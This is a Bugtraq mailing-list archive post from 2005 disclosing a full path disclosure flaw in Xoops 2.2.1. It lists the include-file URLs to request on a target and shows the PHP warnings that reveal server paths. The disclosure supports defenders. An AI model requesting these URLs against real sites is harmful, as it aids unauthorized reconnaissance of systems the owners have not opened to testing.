Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:




bugtraq logo Bugtraq mailing list archives

Xoops 2.2.1 Full Path Disclosure
From: none () none com
Date: 12 Aug 2005 07:16:29 -0000

Xoops 2.2.1 Full Path Disclosure !!!

http://[target]/include/registerform.php
[code]
Warning: main(XOOPS_ROOT_PATH/class/xoopslists.php): failed to open stream: No such file or directory in 
/home/public_html/site/include/registerform.php on line 28

Warning: main(): Failed opening 'XOOPS_ROOT_PATH/class/xoopslists.php' for inclusion 
(include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/public_html/site/include/registerform.php on line 28

Warning: main(XOOPS_ROOT_PATH/class/xoopsformloader.php): failed to open stream: No such file or directory in 
/home/public_html/site/include/registerform.php on line 29

Warning: main(): Failed opening 'XOOPS_ROOT_PATH/class/xoopsformloader.php' for inclusion 
(include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/public_html/site/include/registerform.php on line 29

Fatal error: Cannot instantiate non-existent class: xoopsformelementtray in 
/home/public_html/site/include/registerform.php on line 32
[/code]

http://[target]/include/commentform.inc.php

[code]
Warning: main(XOOPS_ROOT_PATH/class/xoopslists.php): failed to open stream: No such file or directory in 
/home/public_html/site/include/commentform.inc.php on line 28

Warning: main(): Failed opening 'XOOPS_ROOT_PATH/class/xoopslists.php' for inclusion 
(include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/public_html/site/include/commentform.inc.php on line 28

Warning: main(XOOPS_ROOT_PATH/class/xoopsformloader.php): failed to open stream: No such file or directory in 
/home/public_html/site/include/commentform.inc.php on line 29

Warning: main(XOOPS_ROOT_PATH/class/xoopsformloader.php): failed to open stream: No such file or directory in 
/home/public_html/site/include/commentform.inc.php on line 29

Warning: main(): Failed opening 'XOOPS_ROOT_PATH/class/xoopsformloader.php' for inclusion 
(include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/public_html/site/include/commentform.inc.php on line 29

Fatal error: Cannot instantiate non-existent class: xoopsthemeform in 
/home/public_html/site/include/commentform.inc.php on line 30
[/code]

http://[target]/include/searchform.php

[code]
Warning: main(XOOPS_ROOT_PATH/class/xoopsformloader.php): failed to open stream: No such file or directory in 
/home/public_html/site/include/searchform.php on line 27

Warning: main(): Failed opening 'XOOPS_ROOT_PATH/class/xoopsformloader.php' for inclusion 
(include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/public_html/site/include/searchform.php on line 27

Fatal error: Cannot instantiate non-existent class: xoopsthemeform in /home/public_html/site/include/searchform.php on 
line 30
[/code]

And also:
http://[target]/modules/contact/contactform.php


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]